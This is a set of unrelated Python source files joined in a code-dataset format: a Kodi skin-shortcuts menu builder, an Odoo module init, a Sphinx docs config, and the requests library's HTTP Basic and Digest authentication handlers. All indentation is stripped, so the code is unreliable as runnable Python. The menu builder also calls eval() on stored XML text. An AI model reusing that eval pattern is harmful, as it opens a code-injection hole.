justmenuTreeA.set( "name", "skinshortcuts-group-" + DATA.slugify( submenu ) )
justmenuTreeB.set( "name", "skinshortcuts-group-alt-" + DATA.slugify( submenu ) )
submenuNodes[ submenu ] = [ justmenuTreeA, justmenuTreeB ]
itemidsubmenu = 0
# Get the shortcuts for the submenu
if count == 0:
submenudata = DATA._get_shortcuts( submenu, submenuDefaultID, True, profile[0] )
else:
submenudata = DATA._get_shortcuts( submenu, None, True, profile[0] )
if type( submenudata ) == list:
submenuitems = submenudata
else:
submenuitems = submenudata.findall( "shortcut" )
# Are there any submenu items for the main menu?
if count == 0:
if len( submenuitems ) != 0:
try:
hasSubMenu = xmltree.SubElement( mainmenuItemA, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "True"
if buildMode == "single":
hasSubMenu = xmltree.SubElement( mainmenuItemB, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "True"
except:
# There probably isn't a main menu
pass
else:
try:
hasSubMenu = xmltree.SubElement( mainmenuItemA, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "False"
if buildMode == "single":
hasSubMenu = xmltree.SubElement( mainmenuItemB, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "False"
except:
# There probably isn't a main menu
pass
# If we're building a single menu, update the onclicks of the main menu
if buildMode == "single" and not len( submenuitems ) == 0:
for onclickelement in mainmenuItemB.findall( "onclick" ):
if "condition" in onclickelement.attrib:
onclickelement.set( "condition", "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ") + [" + onclickelement.attrib.get( "condition" ) + "]" )
newonclick = xmltree.SubElement( mainmenuItemB, "onclick" )
newonclick.text = "SetProperty(submenuVisibility," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ",10000)"
newonclick.set( "condition", onclickelement.attrib.get( "condition" ) )
else:
onclickelement.set( "condition", "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
newonclick = xmltree.SubElement( mainmenuItemB, "onclick" )
newonclick.text = "SetProperty(submenuVisibility," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ",10000)"
# Build the submenu items
templateSubMenuItems = xmltree.Element( "includes" )
for submenuItem in submenuitems:
itemidsubmenu += 1
# Build the item without any visibility conditions
menuitem, allProps = self.buildElement( submenuItem, submenu, None, profile[1], itemid = itemidsubmenu, options = options )
isSubMenuElement = xmltree.SubElement( menuitem, "property" )
isSubMenuElement.set( "name", "isSubmenu" )
isSubMenuElement.text = "True"
# Save a copy for the template
templateSubMenuItems.append( Template.copy_tree( menuitem ) )
# Remove any template-only properties
otherProperties, requires, templateOnly = DATA._getPropertyRequires()
for key in otherProperties:
if key in allProps.keys() and key in templateOnly:
# This key is template-only
menuitem.remove( allProps[ key ] )
allProps.pop( key )
# Add it, with appropriate visibility conditions, to the various submenu includes
justmenuTreeA.append( menuitem )
menuitemCopy = Template.copy_tree( menuitem )
visibilityElement = menuitemCopy.find( "visible" )
visibilityElement.text = "[%s] + %s" %( visibilityElement.text, "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
justmenuTreeB.append( menuitemCopy )
if buildMode == "single":
# Add the property 'submenuVisibility'
allmenuTreeCopy = Template.copy_tree( menuitemCopy )
submenuVisibility = xmltree.SubElement( allmenuTreeCopy, "property" )
submenuVisibility.set( "name", "submenuVisibility" )
submenuVisibility.text = DATA.slugify( submenuVisibilityName, convertInteger=True )
allmenuTree.append( allmenuTreeCopy )
menuitemCopy = Template.copy_tree( menuitem )
visibilityElement = menuitemCopy.find( "visible" )
visibilityElement.text = "[%s] + %s" %( visibilityElement.text, "StringCompare(Container(" + mainmenuID + ").ListItem.Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
submenuTree.append( menuitemCopy )
# Build the template for the submenu
Template.parseItems( "submenu", count, templateSubMenuItems, profile[ 2 ], profile[ 1 ], "StringCompare(Container(" + mainmenuID + ").ListItem.Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")", item )
count += 1
if self.hasSettings == False:
# Check if the overrides asks for a forced settings...
overridestree = DATA._get_overrides_skin()
forceSettings = overridestree.getroot().find( "forcesettings" )
if forceSettings is not None:
# We want a settings option to be added
newelement = xmltree.SubElement( mainmenuTree, "item" )
xmltree.SubElement( newelement, "label" ).text = "$LOCALIZE[10004]"
xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
xmltree.SubElement( newelement, "onclick" ).text = "ActivateWindow(settings)"
xmltree.SubElement( newelement, "visible" ).text = profile[1]
if buildMode == "single":
newelement = xmltree.SubElement( mainmenuTree, "item" )
xmltree.SubElement( newelement, "label" ).text = "$LOCALIZE[10004]"
xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
xmltree.SubElement( newelement, "onclick" ).text = "ActivateWindow(settings)"
xmltree.SubElement( newelement, "visible" ).text = profile[1]
if len( self.checkForShortcuts ) != 0:
# Add a value to the variable for all checkForShortcuts
for checkForShortcut in self.checkForShortcuts:
if profile[ 1 ] is not None and xbmc.getCondVisibility( profile[ 1 ] ):
# Current profile - set the skin bool
if checkForShortcut[ 2 ] == "True":
xbmc.executebuiltin( "Skin.SetBool(%s)" %( checkForShortcut[ 1 ] ) )
else:
xbmc.executebuiltin( "Skin.Reset(%s)" %( checkForShortcut[ 1 ] ) )
# Save this to the hashes file, so we can set it on profile changes
hashlist.list.append( [ "::SKINBOOL::", [ profile[ 1 ], checkForShortcut[ 1 ], checkForShortcut[ 2 ] ] ] )
# Build the template for the main menu
Template.parseItems( "mainmenu", 0, templateMainMenuItems, profile[ 2 ], profile[ 1 ], "", "", mainmenuID )
# If we haven't built enough main menu items, copy the ones we have
while itemidmainmenu < minitems and fullMenu and len( mainmenuTree ) != 0:
updatedMenuTree = Template.copy_tree( mainmenuTree )
for item in updatedMenuTree:
itemidmainmenu += 1
# Update ID
item.set( "id", str( itemidmainmenu ) )
for idElement in item.findall( "property" ):
if idElement.attrib.get( "name" ) == "id":
idElement.text = "$NUM[%s]" %( str( itemidmainmenu ) )
mainmenuTree.append( item )
# Build any 'Other' templates
Template.writeOthers()
progress.update( 100, message = __language__( 32098 ) )
# Get the skins addon.xml file
addonpath = xbmc.translatePath( os.path.join( "special://skin/", 'addon.xml').encode("utf-8") ).decode("utf-8")
addon = xmltree.parse( addonpath )
extensionpoints = addon.findall( "extension" )
paths = []
for extensionpoint in extensionpoints:
if extensionpoint.attrib.get( "point" ) == "xbmc.gui.skin":
resolutions = extensionpoint.findall( "res" )
for resolution in resolutions:
path = xbmc.translatePath( os.path.join( try_decode( self.skinDir ) , try_decode( resolution.attrib.get( "folder" ) ), "script-skinshortcuts-includes.xml").encode("utf-8") ).decode('utf-8')
paths.append( path )
skinVersion = addon.getroot().attrib.get( "version" )
# Save the tree
DATA.indent( tree.getroot() )
for path in paths:
tree.write( path, encoding="UTF-8" )
# Save the hash of the file we've just written
with open(path, "r+") as f:
DATA._save_hash( path, f.read() )
f.close()
# Save the hashes
# Append the skin version to the hashlist
hashlist.list.append( ["::SKINVER::", skinVersion] )
# Save the hashes
file = xbmcvfs.File( os.path.join( __masterpath__ , xbmc.getSkinDir() + ".hash" ), "w" )
file.write( repr( hashlist.list ) )
file.close()
def buildElement( self, item, groupName, visibilityCondition, profileVisibility, submenuVisibility = None, itemid=-1, options=[] ):
# This function will build an element for the passed Item in
newelement = xmltree.Element( "item" )
allProps = {}
# Set ID
if itemid is not -1:
newelement.set( "id", str( itemid ) )
idproperty = xmltree.SubElement( newelement, "property" )
idproperty.set( "name", "id" )
idproperty.text = "$NUM[%s]" %( str( itemid ) )
allProps[ "id" ] = idproperty
# Label and label2
xmltree.SubElement( newelement, "label" ).text = DATA.local( item.find( "label" ).text )[1]
xmltree.SubElement( newelement, "label2" ).text = DATA.local( item.find( "label2" ).text )[1]
# Icon and thumb
icon = item.find( "override-icon" )
if icon is None:
icon = item.find( "icon" )
if icon is None:
xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
else:
xmltree.SubElement( newelement, "icon" ).text = try_decode( icon.text )
thumb = item.find( "thumb" )
if thumb is not None:
xmltree.SubElement( newelement, "thumb" ).text = try_decode( item.find( "thumb" ).text )
# labelID and defaultID
labelID = xmltree.SubElement( newelement, "property" )
labelID.text = item.find( "labelID" ).text
labelID.set( "name", "labelID" )
allProps[ "labelID" ] = labelID
defaultID = xmltree.SubElement( newelement, "property" )
defaultID.text = item.find( "defaultID" ).text
defaultID.set( "name", "defaultID" )
allProps[ "defaultID" ] = defaultID
# Clear cloned options if main menu
if groupName == "mainmenu":
self.MAINWIDGET = {}
self.MAINBACKGROUND = {}
self.MAINPROPERTIES = {}
# Get fallback custom properties
foundProperties = []
# Additional properties
properties = eval( item.find( "additional-properties" ).text )
if len( properties ) != 0:
for property in properties:
if property[0] == "node.visible":
visibleProperty = xmltree.SubElement( newelement, "visible" )
visibleProperty.text = try_decode( property[1] )
else:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", property[0].decode( "utf-8" ) )
additionalproperty.text = property[1]
allProps[ property[ 0 ] ] = additionalproperty
# If this is a widget or background, set a skin setting to say it's enabled
if property[0] == "widget":
xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-widget-" + property[1] + ")" )
# And if it's the main menu, list it
if groupName == "mainmenu":
xbmc.executebuiltin( "Skin.SetString(skinshortcuts-widget-" + str( self.widgetCount ) + "," + property[ 1 ] + ")" )
self.widgetCount += 1
elif property[0] == "background":
try:
xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-background-" + property[1] + ")" )
except UnicodeEncodeError:
xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-background-" + property[1].encode('utf-8') + ")" )
# If this is the main menu, and we're cloning widgets, backgrounds or properties...
if groupName == "mainmenu":
if "clonewidgets" in options:
widgetProperties = [ "widget", "widgetName", "widgetType", "widgetTarget", "widgetPath", "widgetPlaylist" ]
if property[0] in widgetProperties:
self.MAINWIDGET[ property[0] ] = property[1]
if "clonebackgrounds" in options:
backgroundProperties = [ "background", "backgroundName", "backgroundPlaylist", "backgroundPlaylistName" ]
if property[0] in backgroundProperties:
self.MAINBACKGROUND[ property[0] ] = property[1]
if "cloneproperties" in options:
self.MAINPROPERTIES[ property[0] ] = property[1]
# For backwards compatibility, save widgetPlaylist as widgetPath too
if property[ 0 ] == "widgetPlaylist":
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", "widgetPath" )
additionalproperty.text = try_decode( property[1] )
# Get fallback properties, property requirements, templateOnly value of properties
fallbackProperties, fallbacks = DATA._getCustomPropertyFallbacks( groupName )
# Add fallback properties
for key in fallbackProperties:
if key not in allProps.keys():
# Check whether we have a fallback for the value
for propertyMatch in fallbacks[ key ]:
matches = False
if propertyMatch[ 1 ] is None:
# This has no conditions, so it matched
matches = True
else:
# This has an attribute and a value to match against
for property in properties:
if property[ 0 ] == propertyMatch[ 1 ] and property[ 1 ] == propertyMatch[ 2 ]:
matches = True
break
if matches:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key.decode( "utf-8" ) )
additionalproperty.text = propertyMatch[ 0 ]
allProps[ key ] = additionalproperty
break
# Get property requirements
otherProperties, requires, templateOnly = DATA._getPropertyRequires()
# Remove any properties whose requirements haven't been met
for key in otherProperties:
if key in allProps.keys() and key in requires.keys() and requires[ key ] not in allProps.keys():
# This properties requirements aren't met
newelement.remove( allProps[ key ] )
allProps.pop( key )
# Primary visibility
visibility = item.find( "visibility" )
if visibility is not None:
xmltree.SubElement( newelement, "visible" ).text = visibility.text
#additional onclick (group overrides)
onclicks = item.findall( "additional-action" )
for onclick in onclicks:
onclickelement = xmltree.SubElement( newelement, "onclick" )
onclickelement.text = onclick.text
if "condition" in onclick.attrib:
onclickelement.set( "condition", onclick.attrib.get( "condition" ) )
# Onclick
onclicks = item.findall( "override-action" )
if len( onclicks ) == 0:
onclicks = item.findall( "action" )
for onclick in onclicks:
onclickelement = xmltree.SubElement( newelement, "onclick" )
# Updrage action if necessary
onclick.text = DATA.upgradeAction( onclick.text )
# PVR Action
if onclick.text.startswith( "pvr-channel://" ):
# PVR action
onclickelement.text = "RunScript(script.skinshortcuts,type=launchpvr&channel=" + onclick.text.replace( "pvr-channel://", "" ) + ")"
elif onclick.text.startswith( "ActivateWindow(" ) and xbmc.translatePath( "special://skin/" ) in onclick.text:
# Skin-relative links
try:
actionParts = onclick.text[15:-1].split( "," )
actionParts[1] = actionParts[1].replace( xbmc.translatePath( "special://skin/" ), "" )
path = actionParts[1].split( os.sep )
newAction = "special://skin"
for actionPart in actionParts[1].split( os.sep ):
if actionPart != "":
newAction = newAction + "/" + actionPart
if len( actionParts ) == 2:
onclickelement.text = "ActivateWindow(" + actionParts[0] + "," + newAction + ")"
else:
onclickelement.text = "ActivateWindow(" + actionParts[0] + "," + newAction + "," + actionParts[2] + ")"
except:
pass
else:
onclickelement.text = onclick.text
# Also add it as a path property
if not self.propertyExists( "path", newelement ) and not "path" in allProps.keys():
# we only add the path property if there isn't already one in the list because it has to be unique in Kodi lists
pathelement = xmltree.SubElement( newelement, "property" )
pathelement.set( "name", "path" )
pathelement.text = onclickelement.text
allProps[ "path" ] = pathelement
# Get 'list' property (the action property of an ActivateWindow shortcut)
if not self.propertyExists( "list", newelement ) and not "list" in allProps.keys():
# we only add the list property if there isn't already one in the list because it has to be unique in Kodi lists
listElement = xmltree.SubElement( newelement, "property" )
listElement.set( "name", "list" )
listElement.text = DATA.getListProperty( onclickelement.text.replace('"','') )
allProps[ "list" ] = listElement
if onclick.text == "ActivateWindow(Settings)":
self.hasSettings = True
if "condition" in onclick.attrib:
onclickelement.set( "condition", onclick.attrib.get( "condition" ) )
if len( self.checkForShortcuts ) != 0:
# Check if we've been asked to watch for this shortcut
newCheckForShortcuts = []
for checkforShortcut in self.checkForShortcuts:
if onclick.text.lower() == checkforShortcut[ 0 ]:
# They match, change the value to True
newCheckForShortcuts.append( ( checkforShortcut[ 0 ], checkforShortcut[ 1 ], "True" ) )
else:
newCheckForShortcuts.append( checkforShortcut )
self.checkForShortcuts = newCheckForShortcuts
# Visibility
if visibilityCondition is not None:
visibilityElement = xmltree.SubElement( newelement, "visible" )
if profileVisibility is not None:
visibilityElement.text = profileVisibility + " + [" + visibilityCondition + "]"
else:
visibilityElement.text = visibilityCondition
issubmenuElement = xmltree.SubElement( newelement, "property" )
issubmenuElement.set( "name", "isSubmenu" )
issubmenuElement.text = "True"
allProps[ "isSubmenu" ] = issubmenuElement
elif profileVisibility is not None:
visibilityElement = xmltree.SubElement( newelement, "visible" )
visibilityElement.text = profileVisibility
# Submenu visibility
if submenuVisibility is not None:
submenuVisibilityElement = xmltree.SubElement( newelement, "property" )
submenuVisibilityElement.set( "name", "submenuVisibility" )
if submenuVisibility.isdigit():
submenuVisibilityElement.text = "$NUMBER[" + submenuVisibility + "]"
else:
submenuVisibilityElement.text = DATA.slugify( submenuVisibility )
# Group name
group = xmltree.SubElement( newelement, "property" )
group.set( "name", "group" )
group.text = try_decode( groupName )
allProps[ "group" ] = group
# If this isn't the main menu, and we're cloning widgets or backgrounds...
if groupName != "mainmenu":
if "clonewidgets" in options and len( self.MAINWIDGET ) is not 0:
for key in self.MAINWIDGET:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key )
additionalproperty.text = try_decode( self.MAINWIDGET[ key ] )
allProps[ key ] = additionalproperty
if "clonebackgrounds" in options and len( self.MAINBACKGROUND ) is not 0:
for key in self.MAINBACKGROUND:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key )
additionalproperty.text = DATA.local( self.MAINBACKGROUND[ key ] )[1]
allProps[ key ] = additionalproperty
if "cloneproperties" in options and len( self.MAINPROPERTIES ) is not 0:
for key in self.MAINPROPERTIES:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key )
additionalproperty.text = DATA.local( self.MAINPROPERTIES[ key ] )[1]
allProps[ key ] = additionalproperty
propertyPatterns = self.getPropertyPatterns(labelID.text, groupName)
if len(propertyPatterns) > 0:
propertyReplacements = self.getPropertyReplacements(newelement)
for propertyName in propertyPatterns:
propertyPattern = propertyPatterns[propertyName][0]
for original, replacement in propertyReplacements:
regexpPattern = re.compile(re.escape(original), re.IGNORECASE)
propertyPattern = regexpPattern.sub(replacement, propertyPattern)
additionalproperty = xmltree.SubElement(newelement, "property")
additionalproperty.set("name", propertyName.decode("utf-8"))
additionalproperty.text = propertyPattern.decode("utf-8")
allProps[ propertyName ] = additionalproperty
return( newelement, allProps )
def getPropertyPatterns(self, labelID, group):
propertyPatterns = {}
if not self.loadedPropertyPatterns:
overrides = DATA._get_overrides_skin()
self.propertyPatterns = overrides.getroot().findall("propertypattern")
self.loadedPropertyPatterns = True
for propertyPatternElement in self.propertyPatterns:
propertyName = propertyPatternElement.get("property")
propertyGroup = propertyPatternElement.get("group")
if not propertyName or not propertyGroup or propertyGroup != group or not propertyPatternElement.text:
continue
propertyLabelID = propertyPatternElement.get("labelID")
if not propertyLabelID:
if propertyName not in propertyPatterns:
propertyPatterns[propertyName] = [propertyPatternElement.text, False]
elif propertyLabelID == labelID:
if propertyName not in propertyPatterns or propertyPatterns[propertyName][1] == False:
propertyPatterns[propertyName] = [propertyPatternElement.text, True]
return propertyPatterns
def getPropertyReplacements(self, element):
propertyReplacements = []
for subElement in list(element):
if subElement.tag == "property":
propertyName = subElement.get("name")
if propertyName and subElement.text:
propertyReplacements.append(("::%s::" % propertyName, subElement.text))
elif subElement.text:
propertyReplacements.append(("::%s::" % subElement.tag, subElement.text))
return propertyReplacements
def propertyExists( self, propertyName, element ):
for item in element.findall( "property" ):
if propertyName in item.attrib:
return True
return False
def findIncludePosition( self, list, item ):
try:
return list.index( item )
except:
return None
| gpl-2.0 |
rotofly/odoo | addons/sale_order_dates/__init__.py | 441 | 1071 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sale_order_dates
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
vsdev1/testacular | docs/conf.py | 20 | 7855 | # -*- coding: utf-8 -*-
#
# testacular documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 8 07:33:53 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.todo']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Testacular'
copyright = u'2012, Vojita Jina'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.5'
# The full version, including alpha/beta/rc tags.
release = '0.5.4'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
sys.path.append(os.path.abspath('_themes'))
html_theme_path = ['_themes']
html_theme = 'bootstrap'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = 'Testacular Docs'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'testaculardoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'testacular.tex', u'testacular Documentation',
u'Vojita Jina', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'testacular', u'testacular Documentation',
[u'Vojita Jina'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'testacular', u'testacular Documentation',
u'Vojita Jina', 'testacular', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| mit |
akashsinghal/Speech-Memorization-App | speech/Swift/Speech-gRPC-Streaming/env/lib/python3.6/site-packages/pip/_vendor/requests/auth.py | 355 | 8175 | # -*- coding: utf-8 -*-
"""
requests.auth
~~~~~~~~~~~~~
This module contains the authentication handlers for Requests.
"""
import os
import re
import time
import hashlib
import threading
from base64 import b64encode
from .compat import urlparse, str
from .cookies import extract_cookies_to_jar
from .utils import parse_dict_header, to_native_string
from .status_codes import codes
CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded'
CONTENT_TYPE_MULTI_PART = 'multipart/form-data'
def _basic_auth_str(username, password):
"""Returns a Basic Auth string."""
authstr = 'Basic ' + to_native_string(
b64encode(('%s:%s' % (username, password)).encode('latin1')).strip()
)
return authstr
class AuthBase(object):
"""Base class that all auth implementations derive from"""
def __call__(self, r):
raise NotImplementedError('Auth hooks must be callable.')
class HTTPBasicAuth(AuthBase):
"""Attaches HTTP Basic Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
def __eq__(self, other):
return all([
self.username == getattr(other, 'username', None),
self.password == getattr(other, 'password', None)
])
def __ne__(self, other):
return not self == other
def __call__(self, r):
r.headers['Authorization'] = _basic_auth_str(self.username, self.password)
return r
class HTTPProxyAuth(HTTPBasicAuth):
"""Attaches HTTP Proxy Authentication to a given Request object."""
def __call__(self, r):
r.headers['Proxy-Authorization'] = _basic_auth_str(self.username, self.password)
return r
class HTTPDigestAuth(AuthBase):
"""Attaches HTTP Digest Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
# Keep state in per-thread local storage
self._thread_local = threading.local()
def init_per_thread_state(self):
# Ensure state is initialized just once per-thread
if not hasattr(self._thread_local, 'init'):
self._thread_local.init = True
self._thread_local.last_nonce = ''
self._thread_local.nonce_count = 0
self._thread_local.chal = {}
self._thread_local.pos = None
self._thread_local.num_401_calls = None
def build_digest_header(self, method, url):
"""
:rtype: str
"""
realm = self._thread_local.chal['realm']
nonce = self._thread_local.chal['nonce']
qop = self._thread_local.chal.get('qop')
algorithm = self._thread_local.chal.get('algorithm')
opaque = self._thread_local.chal.get('opaque')
hash_utf8 = None
if algorithm is None:
_algorithm = 'MD5'
else:
_algorithm = algorithm.upper()
# lambdas assume digest modules are imported at the top level
if _algorithm == 'MD5' or _algorithm == 'MD5-SESS':
def md5_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.md5(x).hexdigest()
hash_utf8 = md5_utf8
elif _algorithm == 'SHA':
def sha_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.sha1(x).hexdigest()
hash_utf8 = sha_utf8
KD = lambda s, d: hash_utf8("%s:%s" % (s, d))
if hash_utf8 is None:
return None
# XXX not implemented yet
entdig = None
p_parsed = urlparse(url)
#: path is request-uri defined in RFC 2616 which should not be empty
path = p_parsed.path or "/"
if p_parsed.query:
path += '?' + p_parsed.query
A1 = '%s:%s:%s' % (self.username, realm, self.password)
A2 = '%s:%s' % (method, path)
HA1 = hash_utf8(A1)
HA2 = hash_utf8(A2)
if nonce == self._thread_local.last_nonce:
self._thread_local.nonce_count += 1
else:
self._thread_local.nonce_count = 1
ncvalue = '%08x' % self._thread_local.nonce_count
s = str(self._thread_local.nonce_count).encode('utf-8')
s += nonce.encode('utf-8')
s += time.ctime().encode('utf-8')
s += os.urandom(8)
cnonce = (hashlib.sha1(s).hexdigest()[:16])
if _algorithm == 'MD5-SESS':
HA1 = hash_utf8('%s:%s:%s' % (HA1, nonce, cnonce))
if not qop:
respdig = KD(HA1, "%s:%s" % (nonce, HA2))
elif qop == 'auth' or 'auth' in qop.split(','):
noncebit = "%s:%s:%s:%s:%s" % (
nonce, ncvalue, cnonce, 'auth', HA2
)
respdig = KD(HA1, noncebit)
else:
# XXX handle auth-int.
return None
self._thread_local.last_nonce = nonce
# XXX should the partial digests be encoded too?
base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \
'response="%s"' % (self.username, realm, nonce, path, respdig)
if opaque:
base += ', opaque="%s"' % opaque
if algorithm:
base += ', algorithm="%s"' % algorithm
if entdig:
base += ', digest="%s"' % entdig
if qop:
base += ', qop="auth", nc=%s, cnonce="%s"' % (ncvalue, cnonce)
return 'Digest %s' % (base)
def handle_redirect(self, r, **kwargs):
"""Reset num_401_calls counter on redirects."""
if r.is_redirect:
self._thread_local.num_401_calls = 1
def handle_401(self, r, **kwargs):
"""
Takes the given response and tries digest-auth, if needed.
:rtype: requests.Response
"""
if self._thread_local.pos is not None:
# Rewind the file position indicator of the body to where
# it was to resend the request.
r.request.body.seek(self._thread_local.pos)
s_auth = r.headers.get('www-authenticate', '')
if 'digest' in s_auth.lower() and self._thread_local.num_401_calls < 2:
self._thread_local.num_401_calls += 1
pat = re.compile(r'digest ', flags=re.IGNORECASE)
self._thread_local.chal = parse_dict_header(pat.sub('', s_auth, count=1))
# Consume content and release the original connection
# to allow our new request to reuse the same one.
r.content
r.close()
prep = r.request.copy()
extract_cookies_to_jar(prep._cookies, r.request, r.raw)
prep.prepare_cookies(prep._cookies)
prep.headers['Authorization'] = self.build_digest_header(
prep.method, prep.url)
_r = r.connection.send(prep, **kwargs)
_r.history.append(r)
_r.request = prep
return _r
self._thread_local.num_401_calls = 1
return r
